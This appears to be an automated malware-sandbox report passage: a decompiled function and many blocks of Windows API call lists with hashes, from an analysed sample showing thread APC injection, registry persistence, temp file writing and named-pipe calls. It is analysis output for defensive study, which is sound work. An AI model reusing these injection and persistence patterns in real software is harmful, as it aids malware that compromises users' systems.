                              				char _v20;
                              				WCHAR* _v24;
                              				signed int _v28;
                              				intOrPtr _v32;
                              				void* __edi;
                              				void* __esi;
                              				WCHAR* _t58;
                              				signed int _t60;
                              				signed int _t62;
                              				intOrPtr _t64;
                              				intOrPtr _t66;
                              				intOrPtr _t70;
                              				void* _t72;
                              				void* _t75;
                              				void* _t76;
                              				WCHAR* _t80;
                              				WCHAR* _t83;
                              				void* _t84;
                              				void* _t85;
                              				void* _t86;
                              				intOrPtr _t92;
                              				signed int _t103;
                              				void* _t104;
                              				intOrPtr _t105;
                              				void* _t107;
                              				intOrPtr* _t115;
                              				void* _t119;
                              				WCHAR* _t125;
                              
                              				_t58 =  *0x13ed36c; // 0x3ad9818
                              				_v24 = _t58;
                              				_v28 = 8;
                              				_v20 = GetTickCount();
                              				_t60 = E013E67ED();
                              				_t103 = 5;
                              				_t98 = _t60 % _t103 + 6;
                              				_t62 = E013E67ED();
                              				_t117 = _t62 % _t103 + 6;
                              				_v32 = _t62 % _t103 + 6;
                              				_t64 = E013E3C00(_t60 % _t103 + 6);
                              				_v16 = _t64;
                              				if(_t64 != 0) {
                              					_t66 = E013E3C00(_t117);
                              					_v12 = _t66;
                              					if(_t66 != 0) {
                              						_push(5);
                              						_t104 = 0xa;
                              						_t119 = E013EA725(_t104,  &_v20);
                              						if(_t119 == 0) {
                              							_t119 = 0x13ec1ac;
                              						}
                              						_t70 = E013E4FFE(_v24);
                              						_v8 = _t70;
                              						if(_t70 != 0) {
                              							_t115 = __imp__;
                              							_t72 =  *_t115(_t119);
                              							_t75 =  *_t115(_v8);
                              							_t76 =  *_t115(_a4);
                              							_t80 = E013E55DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                              							_v24 = _t80;
                              							if(_t80 != 0) {
                              								_t105 =  *0x13ed2b8; // 0x26ea5a8
                              								_t28 = _t105 + 0x13eeae8; // 0x530025
                              								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                              								_push(4);
                              								_t107 = 5;
                              								_t83 = E013EA725(_t107,  &_v20);
                              								_a8 = _t83;
                              								if(_t83 == 0) {
                              									_a8 = 0x13ec1b0;
                              								}
                              								_t84 =  *_t115(_a8);
                              								_t85 =  *_t115(_v8);
                              								_t86 =  *_t115(_a4);
                              								_t125 = E013E55DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                              								if(_t125 == 0) {
                              									E013E6DFA(_v24);
                              								} else {
                              									_t92 =  *0x13ed2b8; // 0x26ea5a8
                              									_t44 = _t92 + 0x13eec60; // 0x73006d
                              									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                              									 *_a16 = _v24;
                              									_v28 = _v28 & 0x00000000;
                              									 *_a20 = _t125;
                              								}
                              							}
                              							E013E6DFA(_v8);
                              						}
                              						E013E6DFA(_v12);
                              					}
                              					E013E6DFA(_v16);
                              				}
                              				return _v28;
                              			}

                              APIs
                              • GetTickCount.KERNEL32 ref: 013E5D5C
                              • lstrlen.KERNEL32(00000000,00000005), ref: 013E5DDD
                              • lstrlen.KERNEL32(?), ref: 013E5DEE
                              • lstrlen.KERNEL32(00000000), ref: 013E5DF5
                              • lstrlenW.KERNEL32(80000002), ref: 013E5DFC
                              • wsprintfW.USER32 ref: 013E5E42
                              • lstrlen.KERNEL32(?,00000004), ref: 013E5E65
                              • lstrlen.KERNEL32(?), ref: 013E5E6E
                              • lstrlen.KERNEL32(?), ref: 013E5E75
                              • lstrlenW.KERNEL32(?), ref: 013E5E7C
                              • wsprintfW.USER32 ref: 013E5EB3
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlen$wsprintf$CountFreeHeapTick
                              • String ID:
                              • API String ID: 822878831-0
                              • Opcode ID: c590d406e56af85806734deec3d15e3c9044cd309c7ffb1afdb1f6912b879532
                              • Instruction ID: 602053464af7b13d0c961fff1cf572f2354fdcc67174ed68d71e236e2fedf5a7
                              • Opcode Fuzzy Hash: c590d406e56af85806734deec3d15e3c9044cd309c7ffb1afdb1f6912b879532
                              • Instruction Fuzzy Hash: 3351517690032AEBCF219FA8DC49ADE7BF5EF44318F158064E908A7290DB35CA15DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 010291A8
                              • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 010291BD
                              • RegCreateKeyA.ADVAPI32(80000001,?), ref: 010291E5
                              • HeapFree.KERNEL32(00000000,?), ref: 01029226
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01029236
                              • RtlAllocateHeap.NTDLL(00000000,0103BE3B), ref: 01029249
                              • RtlAllocateHeap.NTDLL(00000000,0103BE3B), ref: 01029258
                              • HeapFree.KERNEL32(00000000,00000000,?,0103BE3B,00000000,?,?,?), ref: 010292A2
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0103BE3B,00000000,?,?,?,?), ref: 010292C6
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0103BE3B,00000000,?,?,?), ref: 010292EB
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0103BE3B,00000000,?,?,?), ref: 01029300
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$CloseCreate
                              • String ID:
                              • API String ID: 4126010716-0
                              • Opcode ID: 6cfe41e007f0f27d4a08ddd47338c4cbccb21be16b367aee74ed2c4e5ab005cb
                              • Instruction ID: cb713f1bafc74158cc822a58a68652b4af5df067e427f840f6e96e9fabba4024
                              • Opcode Fuzzy Hash: 6cfe41e007f0f27d4a08ddd47338c4cbccb21be16b367aee74ed2c4e5ab005cb
                              • Instruction Fuzzy Hash: DD51B3B5D0022DEFDF51DF99D9848EEBBB9FB08348F10806AF645A2124D3365A54DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • PathFindFileNameW.SHLWAPI(?), ref: 01036603
                              • PathFindFileNameW.SHLWAPI(?), ref: 01036619
                              • lstrlenW.KERNEL32(00000000), ref: 0103665C
                              • RtlAllocateHeap.NTDLL(00000000,01048A03), ref: 01036672
                              • memcpy.NTDLL(00000000,00000000,01048A01), ref: 01036685
                              • _wcsupr.NTDLL ref: 01036690
                              • lstrlenW.KERNEL32(?,01048A01), ref: 010366C9
                              • RtlAllocateHeap.NTDLL(00000000,?,01048A01), ref: 010366DE
                              • lstrcpyW.KERNEL32(00000000,?), ref: 010366F4
                              • lstrcatW.KERNEL32(00000000,?), ref: 01036719
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01036728
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                              • String ID:
                              • API String ID: 3868788785-0
                              • Opcode ID: 6c980ee30dd20224b6f0c8f03fac9ce6bafe7c8fccc37404027797a3244930d4
                              • Instruction ID: 2d963b7bb31078927aeeabe93bde2ac8060f0e37105275605a4c8c5b85f5e3bf
                              • Opcode Fuzzy Hash: 6c980ee30dd20224b6f0c8f03fac9ce6bafe7c8fccc37404027797a3244930d4
                              • Instruction Fuzzy Hash: 8D311336600214BBD3315F689DC892F7BEDEBC9350B154529FAD1D3185DB3B99008B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0102A4C9
                              • GetTempPathA.KERNEL32(00000000,00000000,?,?,010242B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 0102A4E1
                              • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0102A4F0
                              • GetTempPathA.KERNEL32(00000001,00000000,?,?,010242B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 0102A503
                              • GetTickCount.KERNEL32 ref: 0102A507
                              • wsprintfA.USER32 ref: 0102A51E
                              • RegCreateKeyA.ADVAPI32(80000001,?,00000000), ref: 0102A559
                              • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 0102A576
                              • lstrlen.KERNEL32(00000000), ref: 0102A580
                              • RegCloseKey.ADVAPI32(?), ref: 0102A59C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000094,00000000,00000001,00000094,00000000), ref: 0102A5AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                              • String ID:
                              • API String ID: 1404517112-0
                              • Opcode ID: 3a7e3a30fd476ffdd754988421090dbe8a3c127da4cc4c3d2f1dffff44ae66b2
                              • Instruction ID: 6263ce52fe196c839ff3b60bf14e5b378215f6cae4180270f82d41db4960c056
                              • Opcode Fuzzy Hash: 3a7e3a30fd476ffdd754988421090dbe8a3c127da4cc4c3d2f1dffff44ae66b2
                              • Instruction Fuzzy Hash: EB316CB5600229FFDB219F95DD88DAF7BACEF04395B004065F986C3114DB368E01CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 01034886
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 01034898
                              • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 010348A5
                              • wsprintfA.USER32 ref: 010348C0
                              • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000094,00000000), ref: 010348D6
                              • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 010348EF
                              • WriteFile.KERNEL32(00000000,00000000), ref: 010348F7
                              • GetLastError.KERNEL32 ref: 01034905
                              • CloseHandle.KERNEL32(00000000), ref: 0103490E
                              • GetLastError.KERNEL32(?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 0103491F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 0103492F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                              • String ID:
                              • API String ID: 3873609385-0
                              • Opcode ID: 185d1c4a73966cc73e7d316fcd20c52174e3c2ffd125964b74d1f7a5c4a439c1
                              • Instruction ID: 5eddcbc68136626813f9586b4b69fa699edc557df7d801156e618a01a9815877
                              • Opcode Fuzzy Hash: 185d1c4a73966cc73e7d316fcd20c52174e3c2ffd125964b74d1f7a5c4a439c1
                              • Instruction Fuzzy Hash: 241190B9281218BFE3716A68ADCCF7B3B9CEB463A5F000065FAC2D6148DA5A0D048771
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0104738A
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 010473A9
                                • Part of subcall function 0102B029: wsprintfA.USER32 ref: 0102B03C
                                • Part of subcall function 0102B029: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0102B04E
                                • Part of subcall function 0102B029: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0102B078
                                • Part of subcall function 0102B029: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0102B08B
                                • Part of subcall function 0102B029: CloseHandle.KERNEL32(?), ref: 0102B094
                              • GetLastError.KERNEL32 ref: 0104767C
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0104768C
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0104769D
                              • RtlExitUserThread.NTDLL(?), ref: 010476AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                              • String ID:
                              • API String ID: 1258333524-0
                              • Opcode ID: 41b233534721258753f51604fbe757af826d22d38d9a0972f026c576564c1545
                              • Instruction ID: 154f6f7d3a801beab19c282089612b8202d762811630af0a64a1c5d4d571073a
                              • Opcode Fuzzy Hash: 41b233534721258753f51604fbe757af826d22d38d9a0972f026c576564c1545
                              • Instruction Fuzzy Hash: 98B158F1900209AFEB319F69CDC4AAA7BEAFF08345F104579FA9AD2191E7359844CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(04B3C988,00000000,00000000,00000000), ref: 0103A5AC
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 0103A5BB
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 0103A5C8
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 0103A5E0
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 0103A5EC
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103A608
                              • wsprintfA.USER32 ref: 0103A6EA
                              • memcpy.NTDLL(00000000,00004000,?), ref: 0103A737
                              • InterlockedExchange.KERNEL32(01050184,00000000), ref: 0103A755
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0103A796
                                • Part of subcall function 0102F559: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0102F582
                                • Part of subcall function 0102F559: memcpy.NTDLL(00000000,?,?), ref: 0102F595
                                • Part of subcall function 0102F559: RtlEnterCriticalSection.NTDLL(01050488), ref: 0102F5A6
                                • Part of subcall function 0102F559: RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102F5BB
                                • Part of subcall function 0102F559: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0102F5F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                              • String ID:
                              • API String ID: 4198405257-0
                              • Opcode ID: b0a6360475dd118f7124faa22eac37db93b3f4ab3b648d0dd318474d49d9bb77
                              • Instruction ID: e6afacf48adf6f3c7eb21bb25f2602bb3f8ab60098a5fe472acf63ea8d2a9607
                              • Opcode Fuzzy Hash: b0a6360475dd118f7124faa22eac37db93b3f4ab3b648d0dd318474d49d9bb77
                              • Instruction Fuzzy Hash: 84616A71A0020AEFDB21CFA8D884EAF7BB9FB88340F04446AF995D7244D7799A54CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 010430A4
                                • Part of subcall function 0102267F: RegCloseKey.ADVAPI32(?,?,01032C45,00000000,00000000,?), ref: 01022706
                              • lstrcmpiW.KERNEL32(01032D37,?,?,01032D37,00000000,?,?,?,01032D37,00000000,00000001,00000000), ref: 010430D3
                              • lstrlenW.KERNEL32(?,?,01032D37,00000000,?,?,?,01032D37,00000000,00000001,00000000), ref: 010430E4
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0104311E
                              • RegCloseKey.ADVAPI32(?,?,?,?,01032D37,00000000,00000001,00000000), ref: 01043149
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0104315F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,01032D37,00000000,00000001,00000000), ref: 01043174
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 01043188
                              • HeapFree.KERNEL32(00000000,01032D37,?,?,?,01032D37,00000000,00000001,00000000), ref: 0104319D
                              • RegCloseKey.ADVAPI32(?,?,?,?,01032D37,00000000,00000001,00000000), ref: 010431A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
                              • String ID:
                              • API String ID: 4138089493-0
                              • Opcode ID: 783aa177e5491b75f7a9992d8755b43158dd1b0a45ad3859c3f31d5df01a3b7e
                              • Instruction ID: ce50c3185256c4dad221a48a78e44df1d707946032e3ba7530b2470df81bffbd
                              • Opcode Fuzzy Hash: 783aa177e5491b75f7a9992d8755b43158dd1b0a45ad3859c3f31d5df01a3b7e
                              • Instruction Fuzzy Hash: 0931ADB5600219FFDB22AF98DDC8DAF7BB9FB48300B004165F685D7028D7369A44DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102EEDE: memset.NTDLL ref: 0102EF00
                                • Part of subcall function 0102EEDE: CloseHandle.KERNEL32(?,?,?,?,?), ref: 0102EFAA
                              • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0102A787
                              • CloseHandle.KERNEL32(?), ref: 0102A793
                              • PathFindFileNameW.SHLWAPI(?), ref: 0102A7A3
                              • lstrlenW.KERNEL32(00000000), ref: 0102A7AD
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0102A7BE
                              • wcstombs.NTDLL ref: 0102A7CF
                              • lstrlen.KERNEL32(?), ref: 0102A7DC
                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?), ref: 0102A819
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102A82B
                              • DeleteFileW.KERNEL32(?), ref: 0102A839
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                              • String ID:
                              • API String ID: 2256351002-0
                              • Opcode ID: 1e5a58a002526f112e48a8460f6e56b718941c991000ca50d368300df76a7932
                              • Instruction ID: cb8af6a2bfe59c9caf721f62085a04ddf6a026cc36063e20ff5869b3a3bedff8
                              • Opcode Fuzzy Hash: 1e5a58a002526f112e48a8460f6e56b718941c991000ca50d368300df76a7932
                              • Instruction Fuzzy Hash: 46311E76A00219FFDF219FA8DD8889E7FB9FF04341B004069FA92A3114DB368955DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetTickCount.KERNEL32 ref: 0103D6B6
                              • CreateFileW.KERNEL32(01024252,80000000,00000003,01050244,00000003,00000000,00000000,?,00000000,?,01024252), ref: 0103D6D3
                              • GetLastError.KERNEL32(?,00000000,?,01024252), ref: 0103D77B
                                • Part of subcall function 0103A02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,0103D07F,?,00000000,?,?,?,01022E53,80000001), ref: 0103A063
                                • Part of subcall function 0103A02D: lstrcpy.KERNEL32(00000000,00000000), ref: 0103A087
                                • Part of subcall function 0103A02D: lstrcat.KERNEL32(00000000,00000000), ref: 0103A08F
                              • GetFileSize.KERNEL32(01024252,00000000,?,00000001,?,00000000,?,01024252), ref: 0103D706
                              • CreateFileMappingA.KERNEL32(01024252,01050244,00000002,00000000,00000000,01024252), ref: 0103D71A
                              • lstrlen.KERNEL32(01024252,?,00000000,?,01024252), ref: 0103D736
                              • lstrcpy.KERNEL32(?,01024252), ref: 0103D746
                              • GetLastError.KERNEL32(?,00000000,?,01024252), ref: 0103D74E
                              • HeapFree.KERNEL32(00000000,01024252,?,00000000,?,01024252), ref: 0103D761
                              • CloseHandle.KERNEL32(01024252,?,00000001,?,00000000,?,01024252), ref: 0103D773
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                              • String ID:
                              • API String ID: 194907169-0
                              • Opcode ID: 9a253d0bc21c0cbaf8fadc4ca466519c3c3b96b3ef1626fe0a21c1c20ab272c0
                              • Instruction ID: c59aa89629e9010faa8b320951817aac120a56fb546e58ca552c7d08dd294d44
                              • Opcode Fuzzy Hash: 9a253d0bc21c0cbaf8fadc4ca466519c3c3b96b3ef1626fe0a21c1c20ab272c0
                              • Instruction Fuzzy Hash: 9F217FB4940208FFDB219FA4D988A9EBFB9FB44354F108469F586E3160E77A8E44CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0102AF95
                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0102AFA1
                              • GetModuleHandleA.KERNEL32(?,04B396FC,00000000,?,00000000), ref: 0102AFC1
                              • GetProcAddress.KERNEL32(00000000), ref: 0102AFC8
                              • Thread32First.KERNEL32(?,0000001C), ref: 0102AFD8
                              • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0102AFF3
                              • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0102B004
                              • CloseHandle.KERNEL32(00000000), ref: 0102B00B
                              • Thread32Next.KERNEL32(?,0000001C), ref: 0102B014
                              • CloseHandle.KERNEL32(?), ref: 0102B020
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                              • String ID:
                              • API String ID: 2341152533-0
                              • Opcode ID: 646bec8c5b6e06f5fec38cdc3a29c47bc720e7f635857a008f7d678cbebc0bd2
                              • Instruction ID: 07d7f991aa28fe8e86ff3a78e408752267696f7721b7eac6460835a6f95d2d06
                              • Opcode Fuzzy Hash: 646bec8c5b6e06f5fec38cdc3a29c47bc720e7f635857a008f7d678cbebc0bd2
                              • Instruction Fuzzy Hash: 51218EB2A00118EFDF11AFE4DDC8DEE7BB9FB08380F004126FA91A7150D73A99058B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetEvent.KERNEL32(?,?,0102EA6E), ref: 0103E611
                                • Part of subcall function 010234EE: InterlockedExchange.KERNEL32(?,000000FF), ref: 010234F5
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0102EA6E), ref: 0103E631
                              • CloseHandle.KERNEL32(00000000,?,0102EA6E), ref: 0103E63A
                              • CloseHandle.KERNEL32(?,?,?,0102EA6E), ref: 0103E644
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103E64C
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103E664
                              • Sleep.KERNEL32(000001F4), ref: 0103E673
                              • CloseHandle.KERNEL32(?), ref: 0103E680
                              • LocalFree.KERNEL32(?), ref: 0103E68B
                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0103E695
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                              • String ID:
                              • API String ID: 1408595562-0
                              • Opcode ID: 86095ef833740951b84a2b20bef273b0a1579b4ee667d7739be9c236ca54af74
                              • Instruction ID: 2a7213632a17ea0d6da1dff88c883dd896c46f0c78fd05cb4b7429504e4485ea
                              • Opcode Fuzzy Hash: 86095ef833740951b84a2b20bef273b0a1579b4ee667d7739be9c236ca54af74
                              • Instruction Fuzzy Hash: 31118CB9240315EFDB306B69D98895ABBEDBF887803000A28F2C2D3454CB3AE8009B14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,0102276D,00000000,00000001,?,?,?), ref: 0104122F
                              • lstrlen.KERNEL32(?), ref: 0104123F
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01041273
                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0104129E
                              • memcpy.NTDLL(00000000,?,?), ref: 010412BD
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0104131E
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 01041340
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Allocatelstrlenmemcpy$Free
                              • String ID: W
                              • API String ID: 3204852930-655174618
                              • Opcode ID: c66ebbb308ac5a96eb97bcd233f869265a62555e95f26408e0ea7d4d683aab9c
                              • Instruction ID: 7fa752c0726ea23d48d3f5a11882ebde9c8548b451db61d72554e24c119ea2e1
                              • Opcode Fuzzy Hash: c66ebbb308ac5a96eb97bcd233f869265a62555e95f26408e0ea7d4d683aab9c
                              • Instruction Fuzzy Hash: D6411AB590020AEFDF11DF94C9C4AAE7BB9FF04345F148065F995A7210E731AA94DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedIncrement.KERNEL32(010500CC), ref: 0102537D
                              • lstrcpy.KERNEL32(00000000), ref: 010253B9
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • GetLastError.KERNEL32(00000000), ref: 01025448
                              • HeapFree.KERNEL32(00000000,?), ref: 0102545F
                              • InterlockedDecrement.KERNEL32(010500CC), ref: 01025476
                              • DeleteFileA.KERNEL32(00000000), ref: 01025497
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010254A7
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                              • String ID: t
                              • API String ID: 908044853-2238339752
                              • Opcode ID: b61deb9adc965e4484b3469c2825be83c776d8200419f07ceb16159907b3be19
                              • Instruction ID: 46fbe8f1e5d81dda25dac325039fa9c9ffea048d686e13a11b087d51e8416fd3
                              • Opcode Fuzzy Hash: b61deb9adc965e4484b3469c2825be83c776d8200419f07ceb16159907b3be19
                              • Instruction Fuzzy Hash: 91314876A00225FBDB21AFA4CD84AEEBBB8EF44715F108065FAC5EB144DB758A40C794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                              • RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                              • memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                              • memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                              • CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                              • GetLastError.KERNEL32 ref: 0102FDE1
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                              • String ID: (
                              • API String ID: 2237239663-3887548279
                              • Opcode ID: 08912b0484d4ad2c2b19279b4de1577618e07c906e54fb0e8bee5474bc576e53
                              • Instruction ID: d4bd877bd3852ce2f3e0362ae5e6f2770b5e9a714ff1b93414c9e1c818f88688
